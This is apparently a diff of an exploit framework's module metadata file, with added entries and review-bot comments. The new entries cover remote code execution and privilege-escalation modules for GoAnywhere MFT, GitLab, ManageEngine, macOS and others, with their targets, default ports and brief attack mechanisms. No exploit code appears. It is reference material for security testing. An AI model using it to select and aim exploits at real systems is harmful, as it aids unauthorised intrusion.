"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs"
]
},
"session_types": false,
"needs_cleanup": null
@@ -78043,7 +79196,7 @@
"Unix Command",
"Linux Dropper"
],
"mod_time": "2022-04-26 12:34:45 +0000",
"mod_time": "2023-02-08 15:20:32 +0000",
"path": "/modules/exploits/linux/redis/redis_debian_sandbox_escape.rb",
"is_install_path": true,
"ref_name": "linux/redis/redis_debian_sandbox_escape",
@@ -79187,7 +80340,7 @@
"targets": [
"Automatic"
],
"mod_time": "2022-04-18 09:36:52 +0000",
"mod_time": "2023-01-31 23:59:22 +0000",
"path": "/modules/exploits/linux/ssh/solarwinds_lem_exec.rb",
"is_install_path": true,
"ref_name": "linux/ssh/solarwinds_lem_exec",
@@ -79195,6 +80348,15 @@
"post_auth": true,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
]
},
"session_types": false,
"needs_cleanup": null
@@ -79232,7 +80394,7 @@
"targets": [
"Symantec Messaging Gateway 9.5"
],
"mod_time": "2022-04-18 09:36:52 +0000",
"mod_time": "2023-01-31 23:59:22 +0000",
"path": "/modules/exploits/linux/ssh/symantec_smg_ssh.rb",
"is_install_path": true,
"ref_name": "linux/ssh/symantec_smg_ssh",
@@ -79240,6 +80402,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
]
},
"session_types": false,
"needs_cleanup": null
@@ -79273,7 +80444,7 @@
"targets": [
"Universal"
],
"mod_time": "2022-04-18 09:36:52 +0000",
"mod_time": "2023-01-31 23:59:22 +0000",
"path": "/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb",
"is_install_path": true,
"ref_name": "linux/ssh/vmware_vdp_known_privkey",
@@ -79281,6 +80452,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
]
},
"session_types": false,
"needs_cleanup": null
@@ -84085,7 +85265,7 @@
"Linux",
"Windows"
],
"mod_time": "2021-08-27 17:15:33 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/exploits/multi/http/atutor_upload_traversal.rb",
"is_install_path": true,
"ref_name": "multi/http/atutor_upload_traversal",
@@ -84093,6 +85273,16 @@
"post_auth": true,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs"
],
"Reliability": [
]
},
"session_types": false,
"needs_cleanup": true
@@ -85201,7 +86391,7 @@
"Spencer McIntyre",
"jheysel-r7"
],
"description": "This module leverages a pre-authentication remote code execution vulnerability in the OpenAM identity and\n access management solution. The vulnerability arises from a Java deserialization flaw in OpenAMs\n implementation of the Jato framework and can be triggered by a simple one-line GET or POST request to a\n vulnerable endpoint. Successful exploitation yields code execution on the target system as the service user.\n\n This vulnerability also affects the ForgeRock identity platform which is built on top of OpenAM and is thus\n is susceptible to the same issue.",
"description": "This module leverages a pre-authentication remote code execution vulnerability in the OpenAM identity and\n access management solution. The vulnerability arises from a Java deserialization flaw in OpenAMs\n implementation of the Jato framework and can be triggered by a simple one-line GET or POST request to a\n vulnerable endpoint. Successful exploitation yields code execution on the target system as the service user.\n\n This vulnerability also affects the ForgeRock identity platform which is built on top of OpenAM and is thus\n is susceptible to the same issue.",
"references": [
"CVE-2021-35464",
"URL-https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464",
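Review bot: The description carries two typos on both sides of this hunk: "OpenAMs implementation" should be "OpenAM's implementation", and "is thus\n is susceptible" repeats "is". The minus and plus lines are textually identical here, so this is a formatting-only regeneration; fixing the wording in the module source would let the next automatic metadata update pick up the corrected text.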
@@ -85229,7 +86419,7 @@
"Unix Command",
"Linux Dropper"
],
"mod_time": "2021-07-09 16:39:58 +0000",
"mod_time": "2023-02-08 15:20:32 +0000",
"path": "/modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb",
"is_install_path": true,
"ref_name": "multi/http/cve_2021_35464_forgerock_openam",
@@ -85637,6 +86827,68 @@
"session_types": false,
"needs_cleanup": null
},
"exploit_multi/http/fortra_goanywhere_rce_cve_2023_0669": {
"name": "Fortra GoAnywhere MFT Unsafe Deserialization RCE",
"fullname": "exploit/multi/http/fortra_goanywhere_rce_cve_2023_0669",
"aliases": [
],
"rank": 600,
"disclosure_date": "2023-02-01",
"type": "exploit",
"author": [
"Ron Bowes",
"Frycos (Florian Hauser)"
],
"description": "This module exploits CVE-2023-0669, which is an object deserialization\n vulnerability in Fortra GoAnywhere MFT.",
"references": [
"CVE-2023-0669",
"URL-https://attackerkb.com/topics/mg883Nbeva/cve-2023-0669/rapid7-analysis",
"URL-https://frycos.github.io/vulns4free/2023/02/06/goanywhere-forgotten.html"
],
"platform": "Unix,Windows",
"arch": "cmd",
"rport": 8001,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Version 2 Encryption",
"Version 1 Encryption"
],
"mod_time": "2023-02-09 23:06:59 +0000",
"path": "/modules/exploits/multi/http/fortra_goanywhere_rce_cve_2023_0669.rb",
"is_install_path": true,
"ref_name": "multi/http/fortra_goanywhere_rce_cve_2023_0669",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"ioc-in-logs"
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_multi/http/freenas_exec_raw": {
"name": "FreeNAS exec_raw.php Arbitrary Command Execution",
"fullname": "exploit/multi/http/freenas_exec_raw",
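Review bot: The default "rport" of 8001 for the new fortra_goanywhere_rce_cve_2023_0669 entry is absent from its "autofilter_ports" list (80, 8080, 443, 8000, 8888, 8880, 8008, 3000, 8443), so automatic matching on service port will not pick up a GoAnywhere instance listening on its own default port; consider registering 8001 there. The "description" is also a single sentence naming the CVE: it should state which GoAnywhere MFT versions are affected and what the two targets "Version 2 Encryption" and "Version 1 Encryption" select between, and since "check" is false, the docs should say how a user can confirm exposure without running the exploit.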
@@ -86240,7 +87492,7 @@
"targets": [
"Automatic"
],
"mod_time": "2021-08-27 17:15:33 +0000",
"mod_time": "2023-02-08 15:20:32 +0000",
"path": "/modules/exploits/multi/http/gitlab_file_read_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/gitlab_file_read_rce",
@@ -86262,6 +87514,69 @@
"session_types": false,
"needs_cleanup": null
},
"exploit_multi/http/gitlab_github_import_rce_cve_2022_2992": {
"name": "GitLab GitHub Repo Import Deserialization RCE",
"fullname": "exploit/multi/http/gitlab_github_import_rce_cve_2022_2992",
"aliases": [
],
"rank": 600,
"disclosure_date": "2022-10-06",
"type": "exploit",
"author": [
"William Bowling (vakzz)",
"Heyder Andrade <https://infosec.exchange/@heyder>",
"RedWay Security <https://infosec.exchange/@redway>"
],
"description": "An authenticated user can import a repository from GitHub into GitLab.\n If a user attempts to import a repo from an attacker-controlled server,\n the server will reply with a Redis serialization protocol object in the nested\n `default_branch`. GitLab will cache this object and\n then deserialize it when trying to load a user session, resulting in RCE.",
"references": [
"URL-https://hackerone.com/reports/1679624",
"URL-https://github.com/redwaysecurity/CVEs/tree/main/CVE-2022-2992",
"URL-https://gitlab.com/gitlab-org/gitlab/-/issues/371884",
"CVE-2022-2992"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Unix Command"
],
"mod_time": "2023-02-14 15:26:01 +0000",
"path": "/modules/exploits/multi/http/gitlab_github_import_rce_cve_2022_2992.rb",
"is_install_path": true,
"ref_name": "multi/http/gitlab_github_import_rce_cve_2022_2992",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"ioc-in-logs"
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_multi/http/gitlab_shell_exec": {
"name": "Gitlab-shell Code Execution",
"fullname": "exploit/multi/http/gitlab_shell_exec",
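Review bot: The description says GitLab will cache the attacker-supplied object and deserialize it when loading a user session, which implies the cached entry outlives the exploit run, yet "SideEffects" lists only "ioc-in-logs" and "needs_cleanup" is null; either document that the cached object is left behind (and add the matching side-effect note) or state how it is removed. The "post_auth": true flag is correct per the first sentence of the description ("An authenticated user can import a repository"), so the module docs should name the minimum GitLab permission the import requires.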
@@ -88324,6 +89639,72 @@
"session_types": false,
"needs_cleanup": true
},
"exploit_multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966": {
"name": "ManageEngine ADSelfService Plus Unauthenticated SAML RCE",
"fullname": "exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966",
"aliases": [
],
"rank": 600,
"disclosure_date": "2023-01-10",
"type": "exploit",
"author": [
"Khoa Dinh",
"horizon3ai",
"Christophe De La Fuente"
],
"description": "This exploits an unauthenticated remote code execution vulnerability\n that affects Zoho ManageEngine AdSelfService Plus versions 6210 and\n below (CVE-2022-47966). Due to a dependency to an outdated library\n (Apache Santuario version 1.4.1), it is possible to execute arbitrary\n code by providing a crafted `samlResponse` XML to the ADSelfService Plus\n SAML endpoint. Note that the target is only vulnerable if it has been\n configured with SAML-based SSO at least once in the past, regardless of\n the current SAML-based SSO status.",
"references": [
"CVE-2022-47966",
"URL-https://blog.viettelcybersecurity.com/saml-show-stopper/",
"URL-https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/",
"URL-https://github.com/horizon3ai/CVE-2022-47966",
"URL-https://attackerkb.com/topics/gvs0Gv8BID/cve-2022-47966/rapid7-analysis"
],
"platform": "Windows",
"arch": "",
"rport": 9251,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows EXE Dropper",
"Windows Command"
],
"mod_time": "2023-01-30 12:18:08 +0000",
"path": "/modules/exploits/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966.rb",
"is_install_path": true,
"ref_name": "multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs"
],
"Reliability": [
"repeatable-session"
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_multi/http/manageengine_auth_upload": {
"name": "ManageEngine Multiple Products Authenticated File Upload",
"fullname": "exploit/multi/http/manageengine_auth_upload",
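Review bot: Two wording problems in the description of the new manageengine_adselfservice_plus_saml_rce_cve_2022_47966 entry: "a dependency to an outdated library" should read "a dependency on", and the product is spelled "AdSelfService Plus" in the description but "ADSelfService Plus" in the name. Also, the default "rport" 9251 is not in "autofilter_ports", so the module will not be auto-matched to a service on its own default port.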
@@ -88483,6 +89864,74 @@
"session_types": false,
"needs_cleanup": true
},
"exploit_multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966": {
"name": "ManageEngine ServiceDesk Plus Unauthenticated SAML RCE",
"fullname": "exploit/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966",
"aliases": [
],
"rank": 600,
"disclosure_date": "2023-01-10",
"type": "exploit",
"author": [
"Khoa Dinh",
"horizon3ai",
"Christophe De La Fuente"
],
"description": "This exploits an unauthenticated remote code execution vulnerability\n that affects Zoho ManageEngine ServiceDesk Plus versions 14003 and\n below (CVE-2022-47966). Due to a dependency to an outdated library\n (Apache Santuario version 1.4.1), it is possible to execute arbitrary\n code by providing a crafted `samlResponse` XML to the ServiceDesk Plus\n SAML endpoint. Note that the target is only vulnerable if it has been\n configured with SAML-based SSO at least once in the past, regardless of\n the current SAML-based SSO status.",
"references": [
"CVE-2022-47966",
"URL-https://blog.viettelcybersecurity.com/saml-show-stopper/",
"URL-https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/",
"URL-https://github.com/horizon3ai/CVE-2022-47966",
"URL-https://attackerkb.com/topics/gvs0Gv8BID/cve-2022-47966/rapid7-analysis"
],
"platform": "Linux,Unix,Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows EXE Dropper",
"Windows Command",
"Unix Command",
"Linux Dropper"
],
"mod_time": "2023-01-30 12:15:14 +0000",
"path": "/modules/exploits/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.rb",
"is_install_path": true,
"ref_name": "multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs"
],
"Reliability": [
"repeatable-session"
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_multi/http/mantisbt_manage_proj_page_rce": {
"name": "Mantis manage_proj_page PHP Code Execution",
"fullname": "exploit/multi/http/mantisbt_manage_proj_page_rce",
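Review bot: "arch" is the empty string while the four targets span "Windows EXE Dropper", "Windows Command", "Unix Command" and "Linux Dropper" and "platform" is "Linux,Unix,Windows"; if arch is meant to be target-specific that is fine, but an empty top-level arch means the entry cannot be filtered by architecture, so confirm it is intentional. The description reuses the "dependency to an outdated library" wording from the ADSelfService Plus entry for the same CVE; both should be corrected to "dependency on" at the source so one proof-read text is shared.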
@@ -93791,7 +95240,7 @@
"Windows",
"Linux"
],
"mod_time": "2018-12-14 13:08:50 +0000",
"mod_time": "2022-12-30 12:29:14 +0000",
"path": "/modules/exploits/multi/http/struts2_namespace_ognl.rb",
"is_install_path": true,
"ref_name": "multi/http/struts2_namespace_ognl",
@@ -97569,7 +99018,7 @@
"h00die <mike@stcyrsecurity.com>",
"KotCzarny"
],
"description": "This module attempts to exploit a debug backdoor privilege escalation in\n Allwinner SoC based devices.\n Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4\n Vulnerable OS: all OS images available for Orange Pis,\n any for FriendlyARM's NanoPi M1,\n SinoVoip's M2+ and M3,\n Cuebietech's Cubietruck +\n Linksprite's pcDuino8 Uno\n Exploitation may be possible against Dragon (x10) and Allwinner Android tablets",
"description": "This module attempts to exploit a debug backdoor privilege escalation in\n Allwinner SoC based devices.\n\n Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4.\n\n Vulnerable OS: all OS images available for Orange Pis,\n any for FriendlyARM's NanoPi M1,\n SinoVoip's M2+ and M3,\n Cuebietech's Cubietruck +\n Linksprite's pcDuino8 Uno.\n Exploitation may be possible against Dragon (x10) and Allwinner Android tablets.",
"references": [
"CVE-2016-10225",
"URL-http://forum.armbian.com/index.php/topic/1108-security-alert-for-allwinner-sun8i-h3a83th8/",
@@ -97588,7 +99037,7 @@
"targets": [
"Auto"
],
"mod_time": "2020-10-02 17:38:06 +0000",
"mod_time": "2023-01-28 15:02:24 +0000",
"path": "/modules/exploits/multi/local/allwinner_backdoor.rb",
"is_install_path": true,
"ref_name": "multi/local/allwinner_backdoor",
@@ -97596,6 +99045,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Reliability": [
"repeatable-session"
],
"Stability": [
"crash-safe"
],
"SideEffects": [
"artifacts-on-disk"
]
},
"session_types": [
"shell",
@@ -97617,7 +99075,7 @@
"Romain Trouve",
"bcoles <bcoles@gmail.com>"
],
"description": "This module attempts to gain root privileges on systems running\n MagniComp SysInfo versions prior to 10-H64.\n\n The .mcsiwrapper suid executable allows loading a config file using the\n '--configfile' argument. The 'ExecPath' config directive is used to set\n the executable load path. This module abuses this functionality to set\n the load path resulting in execution of arbitrary code as root.\n\n This module has been tested successfully with SysInfo version\n 10-H63 on Fedora 20 x86_64, 10-H32 on Fedora 27 x86_64, 10-H10 on\n Debian 8 x86_64, and 10-GA on Solaris 10u11 x86.",
"description": "This module attempts to gain root privileges on systems running\n MagniComp SysInfo versions prior to 10-H64.\n\n The .mcsiwrapper suid executable allows loading a config file using the\n '--configfile' argument. The 'ExecPath' config directive is used to set\n the executable load path. This module abuses this functionality to set\n the load path resulting in execution of arbitrary code as root.\n\n This module has been tested successfully with SysInfo version\n 10-H63 on Fedora 20 x86_64, 10-H32 on Fedora 27 x86_64, 10-H10 on\n Debian 8 x86_64, and 10-GA on Solaris 10u11 x86.",
"references": [
"CVE-2017-6516",
"BID-96934",
@@ -97639,7 +99097,7 @@
"Solaris",
"Linux"
],
"mod_time": "2021-02-17 12:33:59 +0000",
"mod_time": "2023-01-28 15:02:24 +0000",
"path": "/modules/exploits/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc.rb",
"is_install_path": true,
"ref_name": "multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc",
@@ -97652,6 +99110,9 @@
],
"Stability": [
"crash-safe"
],
"SideEffects": [
"artifacts-on-disk"
]
},
"session_types": [
@@ -97757,7 +99218,7 @@
"Linux x64",
"Linux x86"
],
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-01-28 15:02:24 +0000",
"path": "/modules/exploits/multi/local/xorg_x11_suid_server.rb",
"is_install_path": true,
"ref_name": "multi/local/xorg_x11_suid_server",
@@ -97765,6 +99226,16 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Reliability": [
"unreliable-session"
],
"Stability": [
"crash-service-down"
],
"SideEffects": [
"artifacts-on-disk",
"config-changes"
]
},
"session_types": [
"shell",
@@ -97785,7 +99256,7 @@
"Narendra Shinde",
"Aaron Ringo"
],
"description": "This module attempts to gain root privileges with SUID Xorg X11 server\n versions 1.19.0 < 1.20.3.\n\n A permission check flaw exists for -modulepath and -logfile options when\n starting Xorg. This allows unprivileged users that can start the server\n the ability to elevate privileges and run arbitrary code under root\n privileges.\n\n This module has been tested with CentOS 7 (1708).\n CentOS default install will require console auth for the users session.\n Xorg must have SUID permissions and may not start if running.\n\n On successful exploitation artifacts will be created consistant\n with starting Xorg.",
"description": "This module attempts to gain root privileges with SUID Xorg X11 server\n versions 1.19.0 < 1.20.3.\n\n A permission check flaw exists for -modulepath and -logfile options when\n starting Xorg. This allows unprivileged users that can start the server\n the ability to elevate privileges and run arbitrary code under root\n privileges.\n\n This module has been tested with CentOS 7 (1708).\n CentOS default install will require console auth for the users session.\n Xorg must have SUID permissions and may not start if running.\n\n On successful exploitation artifacts will be created consistant\n with starting Xorg.",
"references": [
"CVE-2018-14665",
"BID-105741",
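Review bot: The description still contains "consistant" (should be "consistent") and "the users session" (should be "the user's session"); the plus side of this hunk appears identical to the minus side, so the change is formatting only and the typos will persist until the module source is corrected. The text "may not start if running" is also ambiguous: say explicitly that the exploit will fail if an Xorg server is already running.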
@@ -97809,7 +99280,7 @@
"Solaris x86",
"Solaris x64"
],
"mod_time": "2021-02-17 12:33:59 +0000",
"mod_time": "2023-01-28 15:02:24 +0000",
"path": "/modules/exploits/multi/local/xorg_x11_suid_server_modulepath.rb",
"is_install_path": true,
"ref_name": "multi/local/xorg_x11_suid_server_modulepath",
@@ -97817,6 +99288,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Reliability": [
"repeatable-session"
],
"Stability": [
"crash-service-down"
],
"SideEffects": [
"artifacts-on-disk"
]
},
"session_types": [
"shell",
@@ -98369,7 +99849,7 @@
"Linux (Command)",
"AIX (Command)"
],
"mod_time": "2021-08-27 17:15:33 +0000",
"mod_time": "2023-02-08 15:46:07 +0000",
"path": "/modules/exploits/multi/misc/ibm_tm1_unauth_rce.rb",
"is_install_path": true,
"ref_name": "multi/misc/ibm_tm1_unauth_rce",
@@ -98377,6 +99857,17 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"config-changes",
"artifacts-on-disk",
"ioc-in-logs"
]
},
"session_types": false,
"needs_cleanup": true
@@ -101315,7 +102806,7 @@
"Qualys",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a vulnerability in the OpenBSD `ld.so`\n dynamic loader (CVE-2019-19726).\n\n The `_dl_getenv()` function fails to reset the `LD_LIBRARY_PATH`\n environment variable when set with approximately `ARG_MAX` colons.\n\n This can be abused to load `libutil.so` from an untrusted path,\n using `LD_LIBRARY_PATH` in combination with the `chpass` set-uid\n executable, resulting in privileged code execution.\n\n This module has been tested successfully on:\n\n OpenBSD 6.1 (amd64); and\n OpenBSD 6.6 (amd64)",
"description": "This module exploits a vulnerability in the OpenBSD `ld.so`\n dynamic loader (CVE-2019-19726).\n\n The `_dl_getenv()` function fails to reset the `LD_LIBRARY_PATH`\n environment variable when set with approximately `ARG_MAX` colons.\n\n This can be abused to load `libutil.so` from an untrusted path,\n using `LD_LIBRARY_PATH` in combination with the `chpass` set-uid\n executable, resulting in privileged code execution.\n\n This module has been tested successfully on:\n\n OpenBSD 6.1 (amd64); and\n OpenBSD 6.6 (amd64)",
"references": [
"CVE-2019-19726",
"EDB-47780",
@@ -101337,7 +102828,7 @@
"targets": [
"Automatic"
],
"mod_time": "2020-09-18 11:38:43 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/openbsd/local/dynamic_loader_chpass_privesc.rb",
"is_install_path": true,
"ref_name": "openbsd/local/dynamic_loader_chpass_privesc",
@@ -101345,6 +102836,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"artifacts-on-disk"
]
},
"session_types": [
"shell"
@@ -102340,6 +103840,63 @@
],
"needs_cleanup": true
},
"exploit_osx/local/mac_dirty_cow": {
"name": "macOS Dirty Cow Arbitrary File Write Local Privilege Escalation",
"fullname": "exploit/osx/local/mac_dirty_cow",
"aliases": [
],
"rank": 600,
"disclosure_date": "2022-12-17",
"type": "exploit",
"author": [
"Ian Beer",
"Zhuowei Zhang",
"timwr"
],
"description": "An app may be able to execute arbitrary code with kernel privileges",
"references": [
"CVE-2022-46689",
"URL-https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.61.2/tests/vm/vm_unaligned_copy_switch_race.c",
"URL-https://github.com/zhuowei/MacDirtyCowDemo"
],
"platform": "OSX",
"arch": "x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Mac OS X x64 (Native Payload)"
],
"mod_time": "2023-02-02 13:29:43 +0000",
"path": "/modules/exploits/osx/local/mac_dirty_cow.rb",
"is_install_path": true,
"ref_name": "osx/local/mac_dirty_cow",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"SideEffects": [
"artifacts-on-disk",
"config-changes"
],
"Reliability": [
"repeatable-session"
],
"Stability": [
"crash-safe"
]
},
"session_types": [
"shell",
"meterpreter"
],
"needs_cleanup": true
},
"exploit_osx/local/nfs_mount_root": {
"name": "Mac OS X NFS Mount Privilege Escalation Exploit",
"fullname": "exploit/osx/local/nfs_mount_root",
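Review bot: The description "An app may be able to execute arbitrary code with kernel privileges" reads like an advisory impact statement rather than a description of this module: the name says it is an arbitrary file write local privilege escalation, so the text should say what is written, which macOS versions are affected, and why "config-changes" and "needs_cleanup": true apply (what is changed and whether it is restored). A reference to the vendor advisory for CVE-2022-46689 alongside the xnu test case and demo repo would let readers verify the affected versions.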
@@ -102938,7 +104495,7 @@
"targets": [
"Auto"
],
"mod_time": "2021-08-27 17:15:33 +0000",
"mod_time": "2023-02-02 18:46:08 +0000",
"path": "/modules/exploits/osx/local/vmware_fusion_lpe.rb",
"is_install_path": true,
"ref_name": "osx/local/vmware_fusion_lpe",
@@ -102946,6 +104503,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Reliability": [
"repeatable-session"
],
"Stability": [
"crash-safe"
],
"SideEffects": [
"artifacts-on-disk"
]
},
"session_types": [
"shell",
@@ -103192,7 +104758,7 @@
"Tim Brown",
"bcoles <bcoles@gmail.com>"
],
"description": "This module attempts to gain root privileges on QNX 6.4.x and 6.5.x\n systems by exploiting the ifwatchd suid executable.\n\n ifwatchd allows users to specify scripts to execute using the '-A'\n command line argument; however, it does not drop privileges when\n executing user-supplied scripts, resulting in execution of arbitrary\n commands as root.\n\n This module has been tested successfully on QNX Neutrino 6.5.0 (x86)\n and 6.5.0 SP1 (x86).",
"description": "This module attempts to gain root privileges on QNX 6.4.x and 6.5.x\n systems by exploiting the ifwatchd suid executable.\n\n ifwatchd allows users to specify scripts to execute using the '-A'\n command line argument; however, it does not drop privileges when\n executing user-supplied scripts, resulting in execution of arbitrary\n commands as root.\n\n This module has been tested successfully on QNX Neutrino 6.5.0 (x86)\n and 6.5.0 SP1 (x86).",
"references": [
"CVE-2014-2533",
"BID-66449",
@@ -103211,7 +104777,7 @@
"targets": [
"Automatic"
],
"mod_time": "2020-10-02 17:38:06 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/qnx/local/ifwatchd_priv_esc.rb",
"is_install_path": true,
"ref_name": "qnx/local/ifwatchd_priv_esc",
@@ -103219,6 +104785,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
]
},
"session_types": [
"shell",
@@ -103240,7 +104815,7 @@
"Mor!p3r",
"bcoles <bcoles@gmail.com>"
],
"description": "This module uses the qconn daemon on QNX systems to gain a shell.\n\n The QNX qconn daemon does not require authentication and allows\n remote users to execute arbitrary operating system commands.\n\n This module has been tested successfully on QNX Neutrino 6.5.0 (x86)\n and 6.5.0 SP1 (x86).",
"description": "This module uses the qconn daemon on QNX systems to gain a shell.\n\n The QNX qconn daemon does not require authentication and allows\n remote users to execute arbitrary operating system commands.\n\n This module has been tested successfully on QNX Neutrino 6.5.0 (x86)\n and 6.5.0 SP1 (x86).",
"references": [
"EDB-21520",
"URL-https://www.optiv.com/blog/pentesting-qnx-neutrino-rtos",
@@ -103259,7 +104834,7 @@
"targets": [
"Automatic"
],
"mod_time": "2020-10-02 17:38:06 +0000",
"mod_time": "2023-02-01 20:51:44 +0000",
"path": "/modules/exploits/qnx/qconn/qconn_exec.rb",
"is_install_path": true,
"ref_name": "qnx/qconn/qconn_exec",
@@ -103267,6 +104842,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
]
},
"session_types": false,
"needs_cleanup": null
@@ -105838,7 +107422,7 @@
"targets": [
"Automatic"
],
"mod_time": "2021-01-21 19:59:29 +0000",
"mod_time": "2023-02-05 15:45:30 +0000",
"path": "/modules/exploits/unix/local/at_persistence.rb",
"is_install_path": true,
"ref_name": "unix/local/at_persistence",
@@ -105846,6 +107430,16 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Reliability": [
"repeatable-session"
],
"Stability": [
"crash-safe"
],
"SideEffects": [
"artifacts-on-disk",
"config-changes"
]
},
"session_types": [
@@ -105885,7 +107479,7 @@
"targets": [
"Automatic"
],
"mod_time": "2021-01-21 19:59:29 +0000",
"mod_time": "2023-02-05 15:45:30 +0000",
"path": "/modules/exploits/unix/local/chkrootkit.rb",
"is_install_path": true,
"ref_name": "unix/local/chkrootkit",
@@ -105893,6 +107487,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Reliability": [
"repeatable-session"
],
"Stability": [
"crash-safe"
],
"SideEffects": [
"artifacts-on-disk"
]
},
"session_types": [
"shell",
@@ -105935,7 +107538,7 @@
"targets": [
"/usr/lib/crontab.local"
],
"mod_time": "2021-02-05 12:15:44 +0000",
"mod_time": "2023-02-05 15:45:30 +0000",
"path": "/modules/exploits/unix/local/emacs_movemail.rb",
"is_install_path": true,
"ref_name": "unix/local/emacs_movemail",
@@ -105943,6 +107546,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Reliability": [
"repeatable-session"
],
"Stability": [
"crash-safe"
],
"SideEffects": [
"artifacts-on-disk"
]
},
"session_types": [
"shell"
@@ -105980,7 +107592,7 @@
"targets": [
"Exim < 4.86.2"
],
"mod_time": "2021-01-21 19:59:29 +0000",
"mod_time": "2023-02-05 15:45:30 +0000",
"path": "/modules/exploits/unix/local/exim_perl_startup.rb",
"is_install_path": true,
"ref_name": "unix/local/exim_perl_startup",
@@ -105988,6 +107600,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Reliability": [
"repeatable-session"
],
"Stability": [
"crash-safe"
],
"SideEffects": [
]
},
"session_types": [
"shell",
@@ -106027,7 +107648,7 @@
"targets": [
"Automatic Target"
],
"mod_time": "2021-01-21 19:59:29 +0000",
"mod_time": "2023-02-05 15:45:30 +0000",
"path": "/modules/exploits/unix/local/netbsd_mail_local.rb",
"is_install_path": true,
"ref_name": "unix/local/netbsd_mail_local",
@@ -106035,6 +107656,16 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Reliability": [
"repeatable-session"
],
"Stability": [
"os-resource-loss"
],
"SideEffects": [
"artifacts-on-disk",
"config-changes"
]
},
"session_types": [
"shell",
@@ -106125,7 +107756,7 @@
"Linux x86",
"BSD x86"
],
"mod_time": "2022-10-05 19:59:20 +0000",
"mod_time": "2023-02-05 15:45:30 +0000",
"path": "/modules/exploits/unix/local/setuid_nmap.rb",
"is_install_path": true,
"ref_name": "unix/local/setuid_nmap",
@@ -142700,7 +144331,7 @@
"Windows Dropper",
"Windows Command"
],
"mod_time": "2021-11-10 11:12:38 +0000",
"mod_time": "2023-02-08 15:20:32 +0000",
"path": "/modules/exploits/windows/http/exchange_proxylogon_rce.rb",
